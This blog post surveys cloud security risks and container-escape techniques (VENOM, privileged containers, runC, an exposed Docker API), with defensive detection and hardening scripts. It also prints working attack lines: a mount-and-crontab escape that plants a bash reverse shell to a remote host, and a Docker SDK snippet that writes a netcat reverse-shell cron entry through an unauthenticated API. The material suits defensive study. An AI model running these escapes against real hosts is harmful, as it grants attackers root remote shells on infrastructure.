Cloud Enterprise Information Security Risks and Work Focus

Risks to cloud security:

1) Access control (insufficient network-layer isolation; application-layer IAM and IDaaS misconfiguration)
2) Identity and credential leakage (AK/SK, account credentials)
3) Misconfiguration (security groups; ES, DB and similar services reachable without authentication)
4) Security vulnerabilities (application vulnerabilities in services tenants expose; platform escape, e.g. VENOM)
5) Security compliance (audit logging / security protection)
6) DDoS (being attacked, or cloud resources being used to attack others)
7) Abuse of cloud resources (cryptomining, proxying to circumvent network censorship)
8) Cloud-native security (images, baselines, missing isolation, runtime protection)

Common Serious Vulnerabilities in Cloud Security

1. Escape

Defensive response: monitor 0-days and hot-patch; fast response backed by live-migration capability; security-product monitoring (interception, alerting)
Escape and intrusion detection: detect exploit attempts and high-risk writes to the host, such as crontab entries, SSH public-key configuration, new network connections, etc.

**eg1:** Virtual machine (VM): the 2015 VENOM escape (CVE-2015-3456, QEMU's emulated floppy disk controller):

      A buffer overflow while the emulated device handles guest I/O lets malicious shellcode execute in the hypervisor process and take control of the host.

eg2:

      2020: an overflow in an emulated USB device, exploitable the same way from the guest.

eg3: Docker escape

1) Privileged container:
Determine whether the container was started with --privileged. A privileged container holds the kernel's full capability set, which shows up as an all-ones CapEff mask:

cat /proc/self/status | grep CapEff   (CentOS 7: 0000001fffffffff, Ubuntu 18.04/20.04: 0000003fffffffff; a container with Docker's default capabilities shows 00000000a80425fb)

Because a privileged container also sees the host's block devices, mount the host root filesystem and write a scheduled task into it (the device name varies; check fdisk -l first):

fdisk -l; mkdir sectest; mount /dev/dm-0 sectest; echo '* * * * * root bash -i >& /dev/tcp/xx.x.x.x/8888 0>&1' >> sectest/etc/crontab
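The CapEff check above can be scripted so the result does not depend on remembering per-distribution hex values. The following is an added example for this post, not the author's code: it decodes the mask into capability names, flags a full-capability (privileged) set, and separately reports the individual capabilities that give an escape path even in a non-privileged container. The two /proc/self/status excerpts are constructed.

```python
"""Decide from /proc/<pid>/status whether a container is privileged.
Added example for this post, not the author's code; the two status excerpts
below are constructed to mirror what `grep CapEff /proc/self/status` shows."""

# Linux capabilities in bit order: bit 0 is CAP_CHOWN, bit 40 is CAP_CHECKPOINT_RESTORE.
CAPABILITIES = [
    "chown", "dac_override", "dac_read_search", "fowner", "fsetid", "kill",
    "setgid", "setuid", "setpcap", "linux_immutable", "net_bind_service",
    "net_broadcast", "net_admin", "net_raw", "ipc_lock", "ipc_owner",
    "sys_module", "sys_rawio", "sys_chroot", "sys_ptrace", "sys_pacct",
    "sys_admin", "sys_boot", "sys_nice", "sys_resource", "sys_time",
    "sys_tty_config", "mknod", "lease", "audit_write", "audit_control",
    "setfcap", "mac_override", "mac_admin", "syslog", "wake_alarm",
    "block_suspend", "audit_read", "perfmon", "bpf", "checkpoint_restore",
]

# Capabilities that give a path off the container even without --privileged.
ESCAPE_CAPS = {
    "sys_admin",        # mount(), cgroup release_agent abuse
    "sys_module",       # load a kernel module
    "sys_ptrace",       # inject into host processes when the pid namespace is shared
    "sys_rawio",        # raw access to block devices
    "dac_read_search",  # open_by_handle_at() on host files ("shocker")
}

# Constructed: a --privileged container on a 38-capability kernel (e.g. Ubuntu 20.04).
PRIVILEGED_STATUS = """\
Name:\tsh
Pid:\t1
CapInh:\t0000000000000000
CapPrm:\t0000003fffffffff
CapEff:\t0000003fffffffff
CapBnd:\t0000003fffffffff
"""

# Constructed: a container started with Docker's default capability set.
DEFAULT_STATUS = """\
Name:\tsh
Pid:\t1
CapInh:\t0000000000000000
CapPrm:\t00000000a80425fb
CapEff:\t00000000a80425fb
CapBnd:\t00000000a80425fb
"""


def parse_cap_eff(status_text: str) -> int:
    """Extract the effective capability mask (hex) from /proc/<pid>/status text."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return int(line.split(":", 1)[1].strip(), 16)
    raise ValueError("no CapEff line in status text")


def decode_caps(mask: int) -> list:
    """Names of the capabilities set in mask, lowest bit first."""
    return [
        CAPABILITIES[bit] if bit < len(CAPABILITIES) else f"cap_{bit}"
        for bit in range(mask.bit_length())
        if (mask >> bit) & 1
    ]


def is_privileged(mask: int) -> bool:
    """--privileged grants every capability the kernel defines, so the mask is a solid
    run of ones starting at bit 0. Requiring at least 37 bits accepts 0x1fffffffff
    (CentOS 7), 0x3fffffffff (Ubuntu 18.04/20.04) and 0x1ffffffffff (kernel 5.9+)
    while rejecting the default set 0xa80425fb."""
    return mask.bit_length() >= 37 and (mask & (mask + 1)) == 0


def assess(status_text: str) -> dict:
    """Summarise what the capability set means for container escape."""
    mask = parse_cap_eff(status_text)
    caps = decode_caps(mask)
    return {
        "cap_eff": f"{mask:016x}",
        "privileged": is_privileged(mask),
        "escape_caps": sorted(ESCAPE_CAPS & set(caps)),
    }


if __name__ == "__main__":
    # Run inside a container to check the current process.
    with open("/proc/self/status") as f:
        print(assess(f.read()))
```

The "solid run of ones" test is deliberately kernel-agnostic: the number of capabilities grows with kernel versions, so comparing against a fixed constant breaks on newer hosts, whereas `--privileged` always yields every defined bit. A container that is not privileged but still holds `sys_admin` or `dac_read_search` is reported separately, because those alone are enough for the mount-based escape shown above.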

2) Mounted docker.sock: with the host's Docker socket inside the container, the attacker controls the daemon and can start a new container that mounts the host root filesystem.
3) runC escape, CVE-2019-5736 (Docker < 18.09.2):
A malicious image or container points its entrypoint at /proc/self/exe, which is the host's runc binary. The escape needs an operator to run docker exec into the container; runc is then executed in the container's context, the attacker obtains a file descriptor to the runc binary through that process, overwrites it, and the next runc invocation runs attacker code as root on the host.
4) Docker API exposed without authentication on 2375/2376: bind-mount a host path into a new container and write a scheduled task through it to gain control.
Detection: GET http://xxxx:2375/version returns the Docker version information.
Exploitation:

import docker

# Docker SDK for Python talking to the unauthenticated API (the target address is left as on the page).
client = docker.DockerClient(base_url='http://xx.168.0.138:2375')

# Bind-mount the host's /etc into the container as /tmp/etc and append a reverse-shell
# cron entry. /etc/crontabs/root is the BusyBox cron spool; adjust the path (and the
# user field) to the host's cron layout where it differs.
data = client.containers.run(
    'alpine:latest',
    r'''sh -c "echo '* * * * * /usr/bin/nc 192.168.0.138 1234 -e /bin/sh' >> /tmp/etc/crontabs/root" ''',
    remove=True,
    volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}},
)
print(data)
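The /version check above is easy to automate with only the standard library, and the same script can audit the daemon.json setting that produces the exposure. This is an added example for this post, not the author's code, and it goes one step beyond the page by pairing the probe with the weak and the corrected daemon configuration; the target host, the 10.0.0.5 management address, the certificate paths and the sample HTTP replies are constructed.

```python
"""Probe for an unauthenticated Docker Engine API and audit the daemon.json
that causes it. Added example for this post, not the author's code; the host,
port, the two daemon.json dicts and the HTTP replies used in comments are
constructed for illustration."""
import http.client
import json


def classify_version_response(status: int, body: str) -> str:
    """Classify the reply to a plaintext GET /version.
    exposed    - the daemon returned its version document, so no auth is required
    tls-only   - the daemon is up but refuses plaintext (Go's TLS server answers
                 HTTP 400 "Client sent an HTTP request to an HTTPS server"); heuristic
    not-docker - something else answered"""
    if status == 200:
        try:
            doc = json.loads(body)
        except json.JSONDecodeError:
            return "not-docker"
        if isinstance(doc, dict) and "ApiVersion" in doc and "Version" in doc:
            return "exposed"
        return "not-docker"
    if status == 400 and "HTTPS server" in body:
        return "tls-only"
    return "not-docker"


def probe(host: str, port: int = 2375, timeout: float = 3.0) -> str:
    """Send GET /version over plain HTTP and classify; 'closed' if unreachable."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", "/version")
        resp = conn.getresponse()
        return classify_version_response(resp.status, resp.read().decode(errors="replace"))
    except (OSError, http.client.HTTPException):
        return "closed"
    finally:
        conn.close()


def audit_daemon_config(config: dict) -> list:
    """Findings for a parsed /etc/docker/daemon.json. A tcp:// listener is safe only
    with tlsverify plus CA, server cert and key; anything else is the exposure above."""
    findings = []
    tcp_hosts = [h for h in config.get("hosts", []) if h.startswith("tcp://")]
    if not tcp_hosts:
        return findings
    tls_ok = config.get("tlsverify") is True and all(
        k in config for k in ("tlscacert", "tlscert", "tlskey")
    )
    for host in tcp_hosts:
        if not tls_ok:
            findings.append(f"{host}: API reachable without client certificate; set tlsverify, tlscacert, tlscert, tlskey")
        if host.startswith(("tcp://0.0.0.0", "tcp://[::]", "tcp://:")):
            findings.append(f"{host}: bound to every interface; bind to a management address or drop the tcp listener")
    return findings


# Constructed: the misconfiguration behind an unauthenticated 2375.
WEAK_DAEMON_JSON = {"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}

# Constructed: the corrected form, mutual TLS on a management address (paths assumed).
HARDENED_DAEMON_JSON = {
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
}


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    print(target, probe(target))
    print("weak:", audit_daemon_config(WEAK_DAEMON_JSON))
    print("hardened:", audit_daemon_config(HARDENED_DAEMON_JSON))
```

Run it as `python3 probe.py <host>` against a lab target. An "exposed" result means anyone who can reach the port has the same power as the SDK snippet above; the fix is the hardened daemon.json shape (mutual TLS, bound to a management address) plus network-layer restriction of 2376 to the hosts that need it.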

5) Control-plane AccessKey leakage: takes over every container of the product

2. Vulnerabilities of cloud service components

  Unauthenticated access and weak passwords on ES and Redis, OSS buckets with public read/write, Docker-family vulnerabilities and logic flaws, etc. Because the cloud is open, once a problem in any system is exposed it can be attacked from the public Internet with no barrier.

3. accesskey leakage

   System AK (also called the super AK),
   product control-plane AK,
   user-level AK

4. Network penetration

   Tenant traffic penetrating into the IDC management network, or tenant 1 moving laterally to tenant 2

Underlay (beneath the cloud):
basic service security: access authentication, north-south and east-west encryption, trust zones with least-privilege isolation.
Overlay (on the cloud):
product configuration risks: services exposed to the public network without authentication, weak passwords; OSS buckets with public read/write; high-risk components open to the outside world

Cloud Native Security:

   Image security: malicious files, component vulnerabilities
   CIS security baseline: k8s cluster configuration baseline, container application configuration; platform-level application mTLS
   Micro-segmentation: network isolation and file isolation
   Runtime: in-memory webshells, shells, escapes

In subsequent iterations...


Origin blog.csdn.net/u013908944/article/details/131768431